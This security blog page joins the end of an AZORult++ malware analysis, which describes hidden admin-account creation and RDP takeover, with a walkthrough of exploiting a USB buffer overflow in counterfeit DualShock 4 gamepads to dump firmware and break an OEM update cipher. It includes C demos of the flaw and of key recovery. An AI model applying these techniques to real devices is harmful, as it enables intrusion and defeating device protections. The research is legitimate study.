For all its flaws, AZORult++ could actually be more dangerous than its predecessor due to its ability to establish a remote connection to the desktop. To do so, AZORult++ creates a user account using the NetUserAdd() function (username and password are specified in the AZORult++ code), before adding this account to the Administrators group:

Next, AZORult++ hides the newly created account by setting the value of the Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist registry key to 0. Likewise, through setting registry key values, a Remote Desktop Protocol (RDP) connection is allowed:

The malicious cherry on the cake is a call to ShellExecuteW() to open a port to establish a remote connection to the desktop:

After that, the infected computer is ready to accept the incoming RDP connection, which allows the cybercriminal — armed with the victim’s IP address and account information — to connect to the infected computer and seize complete control of it.


During development, AZORult underwent several changes related to the expansion of its functionality. Moreover, despite its many flaws, the C++ version is already more threatening than its predecessor due to the ability to establish a remote connection to the desktop. Because AZORult++ is likely still in development, we should expect its functionality to expand and bugs to be eliminated, not to mention attempts to distribute it widely under a name that buyers will recognize.


C&C servers


Hacking microcontroller firmware through a USB

21 March, 2019 - 18:00

In this article, I want to demonstrate extracting the firmware from a secure USB device running on the Cortex M0.

Who hacks video game consoles?

The manufacture of counterfeit and unlicensed products is widespread in the world of video game consoles. It’s a multi-billion dollar industry in which demand creates supply. You can now find devices for almost all the existing consoles that allow you to play copies of licensed video game ‘backups’ from flash drives, counterfeit gamepads and accessories, various adapters, some of which give you an advantage over other players, and devices for the use of cheats in online and offline video games. There are even services that let you buy video game achievements without having to spend hours playing. Of course, this is all sold without the consent of the video game console manufacturers.

Modern video game consoles, just like 20 years ago, are proprietary systems where the rules are set by the hardware manufacturers, and not by the millions of customers using those devices. A variety of protective measures are included in their design to ensure these consoles only run signed code, so they only play licensed and legally acquired video games and all players have equal rights and only play with officially licensed accessories. In some countries it’s even illegal to try and hack your own video game console.

But at the same time the very scale of the protection makes these consoles an attractive target and one big ‘crackme’ for enthusiasts interested in information security and reverse engineering. The more difficult the puzzle, the more interesting it is to solve. Especially if you’ve grown up with a love for video games.

Protection scheme of DualShock 4

Readers who follow my twitter account may know that I’m a long-time fan of reverse engineering video game consoles and everything related to them, including unofficial game devices. In the early days of PlayStation 4, a publicly known vulnerability in the FreeBSD kernel (which PlayStation 4 is based on) let me and many other researchers take a look at the architecture and inner workings of the new game console from Sony. I carried out a lot of different research, some of which included looking at how USB authentication works in PlayStation 4 and how it distinguishes licensed devices and blocks unauthorized devices. This subject was of interest because I had previously done similar research on other consoles. PlayStation 4’s authentication scheme turned out to be much simpler than that used in Xbox 360, but no less effective.

Authorization scheme of PlayStation 4 USB accessories

PS4 sends 0x100 random bytes to DualShock 4 and in response the gamepad creates an RSASSA-PSS SHA-256 signature and sends it back along with the cryptographic constants N and E (public key) needed to verify it. These constants are unique to each manufactured DualShock 4 gamepad. The gamepad also sends a signature needed for verification of N and E. It uses the same RSASSA-PSS SHA-256 algorithm, but the cryptographic constants are the same for all PlayStation 4 consoles and are stored in the kernel.

This means that if you want to authenticate your own USB device, it’s not enough to hack the PlayStation 4 kernel – you need the private key stored inside the gamepad. And even if someone manages to hack a gamepad and obtains the private key, Sony can still blacklist the key with a firmware update. If after eight minutes a game console has not received an authentication response, it stops communication with the gamepad and you need to remove it from the USB port and plug it in again to get it to work. That’s how the early counterfeit gamepads worked: they simulated a USB unplug/plug every eight minutes, which was very annoying for anyone who bought them.

Rumors of super counterfeit DualShock 4

There were no signs of anyone hacking this authentication scheme for quite some time until I heard rumors about new fake gamepads on the market that looked and worked just like the original. I really wanted to take a look at them, so I ordered a few from Chinese stores.

While I was waiting for my parcels to arrive, I decided to try and gather more information about counterfeit gamepads. After quite a few search requests I found a gamepad known as Gator Claw.

Unauthorized Gator Claw gamepad

There was an interesting discussion on Reddit where people were saying that it worked just like other unauthorized gamepads but only for eight minutes, but that the developers had managed to fix this with a firmware update. The store included a link to the firmware update and a manual.

Firmware update manual for Gator Claw

Basics of embedded firmware analysis

The first thing I did was to take a look at the resource section of the firmware updater executable.

Firmware found in resources of Gator Claw’s firmware updater

Readers who are familiar with writing code for embedded devices will most likely recognize this file format. It is the Intel HEX file format, which is commonly used for programming microcontrollers, and many compilers (for example GNU Compiler) can output compiled code in this format. Also, we can see that the beginning of the firmware doesn’t have high entropy and sequences of bytes are easily recognizable. That means the firmware is not encrypted or compressed. After decoding the firmware from Intel HEX format and loading it in a hex editor (010 Editor is able to open files directly in that format) we are able to take a look at it. What architecture is it compiled for? ARM Cortex-M is so widely adopted that I recognize it straight away.

Gator Claw’s firmware (left) and vector table of ARM Cortex-M (right)

According to the specifications, the first double word is the initial stack pointer and after that comes the table of exception vectors. The first double word in this table is the Reset vector, which is used as the firmware entry point. The high addresses of the other exception handlers give an idea of the firmware’s base address.
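The two steps just described, decoding the Intel HEX records and reading the Cortex-M vector table, are small enough to script. The following is an added example written for this article, not code from the post or from the Gator Claw updater: it decodes a constructed three-record Intel HEX image (data, extended linear address and EOF records, with checksums verified), then reads the initial stack pointer and Reset vector and derives the entry point (Thumb addresses carry bit 0 set) and a base-address hint from the upper bits the handlers share. The sample values (SP = 0x20002000, Reset = 0xC1, NMI = 0xD5, HardFault = 0xD9) are constructed, not taken from the real firmware.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define IMG_SIZE 0x100   /* large enough for the constructed sample below */

static int hexval(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    return -1;
}

/* Two hex digits -> byte, or -1 on a bad digit or end of string. */
static int hexbyte(const char *s)
{
    int h = hexval(s[0]);
    if (h < 0) return -1;
    int l = hexval(s[1]);
    return l < 0 ? -1 : (h << 4) | l;
}

/* Decode Intel HEX text into img. Handles data (00), EOF (01) and extended
 * linear address (04) records and verifies every record checksum.
 * Returns the number of data bytes written, or -1 on a malformed record. */
int ihex_decode(const char *text, uint8_t *img, size_t img_size)
{
    uint32_t upper = 0;
    int written = 0;
    const char *p = text;
    for (;;) {
        while (*p == '\n' || *p == '\r' || *p == ' ') p++;
        if (*p == '\0') break;
        if (*p++ != ':') return -1;
        int count = hexbyte(p);      if (count < 0) return -1;
        int a_hi  = hexbyte(p + 2);  if (a_hi < 0)  return -1;
        int a_lo  = hexbyte(p + 4);  if (a_lo < 0)  return -1;
        int type  = hexbyte(p + 6);  if (type < 0)  return -1;
        uint8_t sum = (uint8_t)(count + a_hi + a_lo + type);
        uint8_t data[255];
        const char *d = p + 8;
        for (int i = 0; i < count; i++) {
            int b = hexbyte(d + 2 * i);
            if (b < 0) return -1;
            data[i] = (uint8_t)b;
            sum = (uint8_t)(sum + b);
        }
        int cks = hexbyte(d + 2 * count);
        if (cks < 0 || (uint8_t)(sum + cks) != 0) return -1;   /* checksum mismatch */
        uint32_t addr = upper | ((uint32_t)a_hi << 8) | (uint32_t)a_lo;
        if (type == 0x00) {
            if (addr + (uint32_t)count > img_size) return -1;
            memcpy(img + addr, data, (size_t)count);
            written += count;
        } else if (type == 0x01) {
            break;                                             /* end of file */
        } else if (type == 0x04 && count == 2) {
            upper = ((uint32_t)data[0] << 24) | ((uint32_t)data[1] << 16);
        } else {
            return -1;                                         /* record type not needed here */
        }
        p = d + 2 * count + 2;
    }
    return written;
}

static uint32_t le32(const uint8_t *b)
{
    return (uint32_t)b[0] | ((uint32_t)b[1] << 8) | ((uint32_t)b[2] << 16) | ((uint32_t)b[3] << 24);
}

typedef struct { uint32_t sp, reset, entry, base; int thumb; } cm_vectors_t;

/* Read the Cortex-M vector table at the start of img: word 0 is the initial
 * stack pointer, word 1 the Reset vector. Thumb addresses have bit 0 set, so
 * the real entry point is reset & ~1. The base hint is the upper 16 bits
 * shared by the Reset vector and the next n_vectors non-zero handlers. */
int cm_read_vectors(const uint8_t *img, size_t img_size, int n_vectors, cm_vectors_t *out)
{
    if (img_size < (size_t)(4 * (n_vectors + 2))) return -1;
    out->sp    = le32(img);
    out->reset = le32(img + 4);
    out->thumb = (int)(out->reset & 1u);
    out->entry = out->reset & ~1u;
    uint32_t hi = out->reset & 0xFFFF0000u;
    for (int i = 0; i < n_vectors; i++) {
        uint32_t v = le32(img + 8 + 4 * i);
        if (v != 0 && (v & 0xFFFF0000u) != hi) return -2;      /* handlers not in one region */
    }
    out->base = hi;
    return 0;
}

/* Constructed sample (not the Gator Claw firmware): SP = 0x20002000,
 * Reset = 0xC1 (Thumb), NMI = 0xD5, HardFault = 0xD9, all at base 0. */
const char DEMO_HEX[] =
    ":020000040000FA\n"
    ":1000000000200020C1000000D5000000D900000041\n"
    ":00000001FF\n";

int demo_vectors(cm_vectors_t *v)
{
    uint8_t img[IMG_SIZE] = {0};
    if (ihex_decode(DEMO_HEX, img, sizeof img) != 16) return -1;
    return cm_read_vectors(img, sizeof img, 2, v);
}

int main(void)
{
    cm_vectors_t v;
    if (demo_vectors(&v) != 0) return 1;
    printf("SP=0x%08X reset=0x%08X entry=0x%08X thumb=%d base=0x%08X\n",
           v.sp, v.reset, v.entry, v.thumb, v.base);
    return 0;
}
```

The checksum verification matters when the HEX text comes out of a resource section by hand: a single mis-copied digit silently shifts every later address, and a decoder that ignores checksums will happily load garbage that IDA Pro then analyses as code.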

Besides firmware, the resource section of the firmware updater also contained a configuration file with a description of different microcontrollers. The developers of the firmware updater most probably used publicly available source code from the manufacturers of microcontrollers, which would explain why this configuration file came with source code.

Configuration file with description of different microcontrollers

After searching for the microcontroller identifiers from the config file, we found the site of the manufacturer – Nuvoton. Product information, technical documentation and the SDK are freely available for download without any license agreements.

The site of the Nuvoton microcontroller manufacturer

At this point we have the firmware, we know its architecture and microcontroller manufacturer, and we have information about the base address, initial stack pointer and entry point. We have more information than we actually need to load the firmware in IDA Pro and start analyzing it.

ARM processors have two different instruction sets: ARM (32 bit instructions) and Thumb (16-bit instructions extended with Thumb-2 32-bit instructions). Cortex-M0 supports only Thumb mode so we will switch the radio button in “Processor options – Edit ARM architecture options – Set ARM instructions” to “NO” when loading the firmware in IDA Pro.

After that we can see the firmware has loaded at base address 0 and automatic analysis has recognized almost every function. The question now is how to move forward with the reverse engineering of the firmware?

Example of one of the many firmware functions

If we analyze the firmware, we’ll see that throughout it performs read and write operations to memory with the base address 0x40000000. This is the base address of memory mapped input output (MMIO) registers. These MMIO registers allow you to access and control all the microcontroller’s peripheral components. Everything that the firmware does happens through access to them.

Memory map of peripheral controllers

By searching through the technical documentation for the address 0x40000000 we find that this microcontroller belongs to the M451 family. Now that we know the family of the microcontroller, we are able to download the SDK and code samples for this platform. In the SDK we find a header file with a definition of all MMIO addresses, bit fields and structures. We can also compile code samples with all the libraries and compare them with functions in our IDB, or we can look for the names of the MMIO addresses in the source code and compare it with our disassembly. This makes the process of reverse engineering straightforward. That’s because we know the architecture and model of the microcontroller and we have a definition of all MMIO registers. Analysis would be much more complicated if we didn’t have this information. It’s fair to say that this is why many vendors only distribute the SDK after an NDA is signed.

Finding library functions in the firmware

In the shadow of colossus

I analyzed Gator Claw’s firmware while waiting for my fake gamepad to arrive. There wasn’t much of interest inside – authentication data is sent to another microcontroller accessible over I2C and the response is sent back to the console. The developers of this unlicensed gamepad knew that this firmware may be reverse engineered and the existence of more counterfeit gamepads may hurt their business. To prevent this, another microcontroller was used for the sole purpose of keeping secrets safe. And this is common practice. The hackers put a lot of effort into their product and don’t want to be hacked too.

What really caught my attention in this firmware was the presence of a seemingly unused string. Most likely it was meant to be part of a USB Device Descriptor, but that particular descriptor was left unused. Was this string left on purpose? Is it some kind of signature? Quite probably, because this string is the name of a major hardware manufacturer best known for their logic analyzers. But it also turns out they have a gaming division that aims to be an original equipment manufacturer (OEM) and even has a number of patents related to the production of gaming accessories. Besides that, they also have a subsidiary whose site has a huge assortment of gaming accessories sold under a single brand. Among the products on sale are two dozen adapters that allow the gamepads of one console to be used with another console. For example, there’s one product that lets you connect the gamepad of an Xbox 360 to PlayStation 4, another product that lets you connect a PlayStation 3 gamepad to Xbox One, and so on, including a universal ‘all in one’. The list of products also includes adapters that allow you to connect a PC mouse and keyboard to the PS4, Xbox One and Nintendo Switch video game consoles, various gamepads and printed circuit boards to create your own arcade controllers for gaming consoles. All the products come with firmware updaters similar to the one that was provided for Gator Claw, but with one notable difference – all the firmware is encrypted.

Example of manual and encrypted firmware from resources for one of the products

The printed circuit boards for creating your own arcade controllers let you take a look at PCB design without buying a device and taking it apart. Their design is most likely very close to that of Gator Claw. We can see two microcontrollers; one of them should be Nuvoton M451 and the other is an additional microcontroller to store secrets. All traces go to the microcontroller under black epoxy, so it should be the main microcontroller, and the microcontroller with the four yellow pins seems to have what’s required to work over I2C.

Examples of product PCB design


By this time I had finally received my parcel from Shenzhen and this is what I found inside. I think you’ll agree that the counterfeit gamepad looks exactly like the original DualShock 4. And it feels like it too. It’s a wireless gamepad made with good quality materials and has a working touch pad, speaker and headset port.

Counterfeit DualShock 4 (from the outside)

I pressed one of the combinations found in the update instructions and powered it on. The gamepad booted into DFU mode! After connecting the gamepad to a PC in this mode it was recognized as another device with different identifiers and characteristics. I already knew what I was going to see inside…

Counterfeit DualShock 4 (view of main PCB)

I soldered a few wires to what looked like JTAG points and connected it to a JTAG programmer. The programming tool recognized the microcontroller, but a Security Lock was set.

Programming tool recognized microcontroller but Security Lock was enabled

Hacking microcontroller firmware through a USB

After this rather lengthy introduction, it’s now time to return to the main subject of this article. USB (Universal Serial Bus) is an industry standard for peripheral devices. It’s designed to be very flexible and allow a wide range of applications. The USB protocol defines two kinds of entities – one host, to which other devices connect. USB devices are divided into classes such as hub, human interface, printer, imaging, mass storage device and others.

Connection scheme of USB devices

Data and control exchange between the devices and the host happens through a set of uni-directional or bi-directional pipes. A pipe is a data transfer path between host software and a particular endpoint on a USB device. One device may have many different endpoints to exchange different types of data.

Data transfer types

There are four different types of data transfers:

  • Control Transfers (used to configure a device)
  • Bulk Data Transfers (generated or consumed in relatively large and bursty quantities)
  • Interrupt Data Transfers (used for timely but reliable delivery of data)
  • Isochronous Data Transfers (occupy a prenegotiated amount of USB bandwidth with a prenegotiated delivery latency)

All USB devices must support a specially designated pipe at endpoint zero to which the USB device’s control pipe will be attached.

Those types of data transfers are implemented using the packets shown in the scheme below.

Packets used in USB protocol

In fact, USB protocol is a state machine and in this article we are not going to examine all those packets. Below you can see an example of the packets used in a Control Transfer.

Control Transfer

USB devices may contain vulnerabilities when implementing Bulk Transfers, Interrupt Transfers, Isochronous Transfers, but those types of data transfers are optional and their presence and usage will vary from target to target. But all USB devices support Control Transfers. Their format is common and this makes this type of data transfer the most attractive to analyze for vulnerabilities.

The scheme below shows the format of the SETUP packet used to perform a Control Transfer.

Format of SETUP packet

The SETUP packet occupies 8 bytes and it can be used to obtain different types of data depending on the type of request. Some requests are common to all devices (for example GET DESCRIPTOR); others depend on the class of device or are defined by the manufacturer. The length of data to send or receive is a 16-bit word provided in the SETUP packet.

Examples of standard and class-specific requests

Summing up: Control Transfers use a very simple protocol that’s supported by all USB devices. It can have lots of additional requests and we can control the size of data. All of that makes Control Transfers a perfect target for fuzzing and glitching.


To hack my counterfeit gamepad I didn’t have to fuzz it because I found vulnerabilities while I was looking at the Gator Claw code.

Vulnerable code in handler of HID class requests

Function HID_ClassRequest() is present to emulate the work of the original DualShock 4 gamepad and implements the bare minimum of required requests to get it working with PlayStation 4. USBD_GetSetupPacket() gets the SETUP packet and, depending on the type of report, it will either send data with the function USBD_PrepareCntrlIn() or receive data with the function USBD_PrepareCntrlOut(). This function doesn’t check the length of the requested data, and this should allow us to read part of the internal Flash memory where the firmware is located and also read and write to the beginning of SRAM memory.

Buffer overflow during Control Transfer

The size of the DATA packet is defined in the USB Device Descriptor (also received with the Control Transfer), but what seems to be left unnoticed is the fact that this size defines the length of a single packet and there may be lots of packets depending on the length set in the SETUP packet.

It is noteworthy that the code samples provided on the site of Nuvoton also don’t have checks for length and it could lead to the spread of similar bugs in all products that used this code as a reference.
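The missing check is easiest to see with the SETUP packet format from above beside a handler that trusts wLength and one that does not. The following is an added example written for this article; it is not the Nuvoton sample code or the gamepad firmware, and the function and buffer names (hid_set_report_vuln, hid_set_report_safe, REPORT_SIZE of 64 bytes) are assumptions. It parses two constructed SETUP packets, a SET_REPORT of 256 bytes and a GET_REPORT of 4096 bytes, and shows in a simulated SRAM layout how the trusting handler writes past the report buffer into its neighbour, while the hardened handler STALLs an oversized host-to-device request and clamps a device-to-host one.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* The 8-byte SETUP packet of a Control Transfer, little-endian on the wire. */
typedef struct {
    uint8_t  bmRequestType;  /* bit 7 = direction: 1 device-to-host, 0 host-to-device */
    uint8_t  bRequest;       /* e.g. HID GET_REPORT = 0x01, SET_REPORT = 0x09 */
    uint16_t wValue;         /* HID: report type in the high byte, report ID in the low byte */
    uint16_t wIndex;         /* interface number for class requests */
    uint16_t wLength;        /* total bytes to transfer, over as many DATA packets as needed */
} usb_setup_t;

void usb_parse_setup(const uint8_t raw[8], usb_setup_t *s)
{
    s->bmRequestType = raw[0];
    s->bRequest      = raw[1];
    s->wValue  = (uint16_t)(raw[2] | (raw[3] << 8));
    s->wIndex  = (uint16_t)(raw[4] | (raw[5] << 8));
    s->wLength = (uint16_t)(raw[6] | (raw[7] << 8));
}

#define REPORT_SIZE    64    /* assumed size of the device's report buffer */
#define NEIGHBOUR_SIZE 16

/* Simulated SRAM: the report buffer followed by data that a report transfer
 * must never touch (other variables or the stack in a real device). */
typedef struct {
    uint8_t report[REPORT_SIZE];
    uint8_t neighbour[NEIGHBOUR_SIZE];
} dev_sram_t;

void dev_sram_init(dev_sram_t *m)
{
    memset(m->report, 0x00, REPORT_SIZE);
    memset(m->neighbour, 0xC5, NEIGHBOUR_SIZE);
}

int neighbour_intact(const dev_sram_t *m)
{
    for (int i = 0; i < NEIGHBOUR_SIZE; i++)
        if (m->neighbour[i] != 0xC5) return 0;
    return 1;
}

/* Vulnerable SET_REPORT handling of the kind the post describes: wLength is
 * trusted and every DATA packet is written into the fixed report buffer.
 * The clamp to sizeof(*m) only keeps this simulation inside its own array;
 * the firmware discussed in the post had no bound at all. */
size_t hid_set_report_vuln(dev_sram_t *m, const usb_setup_t *s, const uint8_t *host_data)
{
    size_t n = s->wLength;
    if (n > sizeof *m) n = sizeof *m;
    memcpy((uint8_t *)m, host_data, n);   /* report[] is at offset 0; the copy runs into neighbour[] */
    return n;
}

/* Hardened SET_REPORT: a host-to-device request longer than the buffer is
 * rejected outright (the device STALLs the control pipe). Accepting a
 * truncated write would hide the error, so it is not clamped.
 * Returns bytes accepted, or -1 for STALL. */
int hid_set_report_safe(dev_sram_t *m, const usb_setup_t *s, const uint8_t *host_data)
{
    if (s->wLength > REPORT_SIZE) return -1;
    memcpy(m->report, host_data, s->wLength);
    return (int)s->wLength;
}

/* Hardened GET_REPORT: a device may legitimately return fewer bytes than
 * wLength (the host accepts a short transfer), so the length is clamped to
 * the report and never reads beyond it into flash or SRAM. */
size_t hid_get_report_safe(const dev_sram_t *m, const usb_setup_t *s, uint8_t *out, size_t out_cap)
{
    size_t n = s->wLength < REPORT_SIZE ? s->wLength : REPORT_SIZE;
    if (n > out_cap) n = out_cap;
    memcpy(out, m->report, n);
    return n;
}

/* Constructed SETUP packets: SET_REPORT (feature report 0) of 256 bytes,
 * and GET_REPORT asking for 4096 bytes. */
const uint8_t SETUP_SET_256[8]  = {0x21, 0x09, 0x00, 0x03, 0x00, 0x00, 0x00, 0x01};
const uint8_t SETUP_GET_4096[8] = {0xA1, 0x01, 0x00, 0x03, 0x00, 0x00, 0x00, 0x10};

int main(void)
{
    usb_setup_t s;
    dev_sram_t m;
    uint8_t host[256];
    memset(host, 0x41, sizeof host);
    usb_parse_setup(SETUP_SET_256, &s);
    dev_sram_init(&m);
    hid_set_report_vuln(&m, &s, host);
    printf("vulnerable handler: neighbour intact = %d\n", neighbour_intact(&m));
    dev_sram_init(&m);
    printf("hardened handler: result = %d, neighbour intact = %d\n",
           hid_set_report_safe(&m, &s, host), neighbour_intact(&m));
    return 0;
}
```

The asymmetry between the two hardened paths is deliberate: for IN transfers the USB specification lets the device answer with fewer bytes than the host asked for, so clamping is correct, whereas an OUT transfer that does not fit must be refused, because the host would otherwise believe the whole report was stored.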

Exploitation of buffer overflow in SRAM memory

SRAM (static random access memory) is memory that, among other things, holds the stack. SRAM is often also executable memory (this is configurable). This is usually done to increase performance by having the firmware copy pieces of code that are called often (for example, a Real-Time Operating System) to SRAM. There is no guarantee that the top of the stack will be reachable by a buffer overflow, but the chances of that are nevertheless high.

Surprisingly, the main obstacle to exploiting USB firmware is the operating system. The following was observed while I was working with Windows, but I think most of it also applies to Linux without special patches.

First of all, the operating system doesn’t let you read more than 4 KB during a Control Transfer. Secondly, in my experience the operating system doesn’t let you write more than a single DATA packet during a Control Transfer. Thirdly, the USB device may have hidden requests and all attempts to use them will be blocked by the OS.

This is easy to demonstrate with human interface devices (HID), including gamepads. HIDs come with additional descriptors (HID Descriptor, Report Descriptor, Physical Descriptor). A Report Descriptor is quite different from the other descriptors and consists of different items that describe supported reports. If a report is missing from the Report Descriptor, then the OS will refuse to complete it, even if it’s handled in the device. This hinders the discovery and exploitation of vulnerabilities in the firmware of USB devices, and those nuances most probably prevented the discovery of vulnerabilities in the past.

To solve this problem without having to read and recompile the sources of the Linux kernel, I just used the low-end tools I had at hand: an Arduino Mega board and a USB Host Shield (total < $30).

Connection scheme

After connecting devices with the above scheme, I used the Arduino board to perform a Control Transfer without any interference from the operating system.

Arduino Mega + USB Host Shield

The counterfeit gamepad had the same vulnerabilities as Gator Claw and the first thing I did was to dump part of the firmware.

Partial dump of firmware

The easiest way to find the base address of the firmware dump is to find a structure with pointers to known data. After that we can calculate the delta of addresses and load a partial dump of the firmware to IDA Pro.

Structure with pointers to known data

The firmware dump allowed us to find out the address of the printf() function that outputs over UART the information required for factory quality assurance. More than that, I was able to find the hexdump() function in the dump, meaning I didn’t even need to write shellcode.

Finding functions that aid exploitation

After locating the UART points on the printed circuit board of the gamepad, soldering wires and connecting them to a TTL2USB adapter, we can see the output in a serial terminal.

Standard UART output during gamepad boot

A standard library for Nuvoton microcontrollers comes with a very handy handler of Hard Fault exceptions that outputs a register dump. This greatly facilitates exploitation and allows exploits to be debugged.

UART output after Hard Fault exception caused by stack overwrite

A final exploit to dump firmware can be seen in the screenshot below.

Exploit and shellcode to dump firmware over UART

But this way to dump firmware is not perfect because the microcontrollers of the Nuvoton M451 family may have two different types of firmware – main firmware (APROM) and mini-firmware for device firmware update (LDROM).

Memory map of flash memory and system memory in different modes

APROM and LDROM are mapped at the same memory addresses and because of that it’s only possible to dump one of them. To get a dump of LDROM firmware we need to disable the security lock and read the flash memory with a programming tool.

Shellcode that disables security lock

Crypto fail

Analysis of the firmware responsible for updates (LDROM) revealed that it’s mostly standard code from Nuvoton, but with added code to decrypt firmware updates.

Cryptographic algorithm scheme for decryption of firmware updates

The cryptographic algorithm used for decrypting firmware updates is a custom block cipher. It is performed in cipher block chaining mode, but the block size is just 32 bits. The algorithm takes a key that is a textual (ASCII) identifier of the product and an array of instructions that define what transformation should be performed on the current block. When the end of the key or of the array is reached, its current position is reset to the initial position. The list of transformations includes six operations: xor, subtraction, subtraction (reverse), and the same operations but with the bytes swapped. Because the firmware contains large areas filled with zeroes, it is easy to calculate the secret parts of this algorithm.

Revealing the firmware update encryption key
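Why zero-filled regions give the key away is worth seeing concretely. The following is an added example written for this article and is a model of the structure the post describes, not the OEM's actual algorithm: it assumes a 32-bit CBC with a zero IV, a key word built from four consecutive bytes of the ASCII product id (wrapping at its end), a per-block operation taken cyclically from a known list of the six variants (xor, subtract, reverse subtract, each optionally on the byte-swapped block), and a constructed key "DEMO-PRODUCT-ID" and op schedule. Because every operation is invertible in the key word once the plaintext and the previous ciphertext block are known, a run of zero plaintext yields the key stream directly, and its shortest period is the product id.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* One of three arithmetic ops, optionally applied to the byte-swapped block. */
enum { OP_XOR = 0, OP_SUB = 1, OP_RSUB = 2, OP_SWAP = 4 };

static uint32_t bswap32(uint32_t v)
{
    return (v >> 24) | ((v >> 8) & 0xFF00u) | ((v << 8) & 0xFF0000u) | (v << 24);
}

/* Key word for block i: four consecutive bytes of the ASCII product id,
 * wrapping at its end (how the real firmware packs the key is an assumption). */
uint32_t key_word(const char *key, size_t klen, size_t i)
{
    uint32_t w = 0;
    for (size_t j = 0; j < 4; j++)
        w |= (uint32_t)(uint8_t)key[(4 * i + j) % klen] << (8 * j);
    return w;
}

/* Undo the block op with key word k, then XOR with the previous ciphertext (CBC). */
uint32_t dec_block(uint32_t c, uint32_t prev, uint32_t k, int op)
{
    uint32_t t = (op & OP_SWAP) ? bswap32(c) : c, u;
    switch (op & 3) {
    case OP_XOR: u = t ^ k; break;
    case OP_SUB: u = t - k; break;
    default:     u = k - t; break;      /* OP_RSUB */
    }
    return u ^ prev;
}

/* Inverse of dec_block; used here only to build sample ciphertext. */
uint32_t enc_block(uint32_t p, uint32_t prev, uint32_t k, int op)
{
    uint32_t u = p ^ prev, t;
    switch (op & 3) {
    case OP_XOR: t = u ^ k; break;
    case OP_SUB: t = u + k; break;
    default:     t = k - u; break;
    }
    return (op & OP_SWAP) ? bswap32(t) : t;
}

/* With the op known (it is in the LDROM code) and the plaintext known, one
 * block determines the key word: each op is invertible in k. */
uint32_t solve_key_word(uint32_t c, uint32_t prev, uint32_t p, int op)
{
    uint32_t t = (op & OP_SWAP) ? bswap32(c) : c, u = p ^ prev;
    switch (op & 3) {
    case OP_XOR: return t ^ u;
    case OP_SUB: return t - u;          /* u = t - k */
    default:     return t + u;          /* u = k - t */
    }
}

/* Recover the ASCII key from a ciphertext region whose plaintext is all
 * zeroes. Solves every block for its key word, then takes the shortest
 * period of the resulting byte stream. Returns the key length, 0 if none. */
size_t recover_key(const uint32_t *ct, size_t nblocks, const int *ops, size_t nops,
                   char *key_out, size_t cap)
{
    uint8_t stream[256];
    if (nblocks > sizeof stream / 4) nblocks = sizeof stream / 4;
    uint32_t prev = 0;                                   /* IV assumed to be zero */
    for (size_t i = 0; i < nblocks; i++) {
        uint32_t k = solve_key_word(ct[i], prev, 0, ops[i % nops]);
        for (size_t j = 0; j < 4; j++) stream[4 * i + j] = (uint8_t)(k >> (8 * j));
        prev = ct[i];
    }
    size_t n = 4 * nblocks;
    for (size_t period = 1; 2 * period <= n && period + 1 <= cap; period++) {
        size_t k = period;
        while (k < n && stream[k] == stream[k - period]) k++;
        if (k == n) { memcpy(key_out, stream, period); key_out[period] = '\0'; return period; }
    }
    return 0;
}

/* Constructed demo key and op schedule (not a real product id or schedule). */
const char DEMO_KEY[] = "DEMO-PRODUCT-ID";
const int  DEMO_OPS[6] = { OP_XOR, OP_SUB | OP_SWAP, OP_RSUB, OP_XOR | OP_SWAP, OP_SUB, OP_RSUB | OP_SWAP };

/* Encrypt nblocks of zero plaintext: a stand-in for the part of an update
 * that covers an all-zero flash region. */
void demo_encrypt_zero_region(uint32_t *ct, size_t nblocks)
{
    uint32_t prev = 0;
    size_t klen = strlen(DEMO_KEY);
    for (size_t i = 0; i < nblocks; i++) {
        ct[i] = enc_block(0, prev, key_word(DEMO_KEY, klen, i), DEMO_OPS[i % 6]);
        prev = ct[i];
    }
}

int main(void)
{
    uint32_t ct[32];
    char key[64];
    demo_encrypt_zero_region(ct, 32);
    size_t n = recover_key(ct, 32, DEMO_OPS, 6, key, sizeof key);
    printf("recovered key (%zu bytes): %s\n", n, key);
    return 0;
}
```

The lesson generalises beyond this cipher: a 32-bit block with a key that is only combined by an invertible arithmetic operation offers no confusion at all, so any known plaintext (and firmware images are full of it) leaks key material one word at a time, and CBC only adds a known value per block.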

Applying the algorithm extracted from the firmware of the counterfeit gamepad to all the firmware of the accessories found on the site of a major OEM manufacturer revealed that all of them use this encryption algorithm, and the weaknesses in this algorithm allowed us to calculate the encryption keys for all devices and decrypt their firmware updates. In other words, the algorithm used inside the counterfeit product led to the security of all the products developed by that manufacturer being compromised.


This blog post turned out to be quite long, but I really wanted to prepare it for a very wide audience. I have given a step-by-step guide on the analysis of embedded firmware, finding vulnerabilities and exploiting them to acquire a firmware dump and to carry out code execution on a USB device.

The subject of glitching attacks is not included in the scope of this article, but such attacks are also very effective against USB devices. For those who want to learn more about them, I recommend watching this video. For those wondering how pirates managed to acquire the algorithm and key from DualShock 4 to make their own devices, I suggest reading this article.

As for the mystery of the auxiliary microcontroller that was used to keep secrets, I found out that it was not used in all devices and was only added for obscurity. This microcontroller doesn’t keep any secrets and is only used for SHA1 and SHA256. This research also aids enthusiasts in creating their own open source projects for use with game consoles.

As for buyers of counterfeit gamepads, they are not in an enviable position because manufacturers block illegally used keys and the users end up without a working gamepad or hints on where to get firmware updates.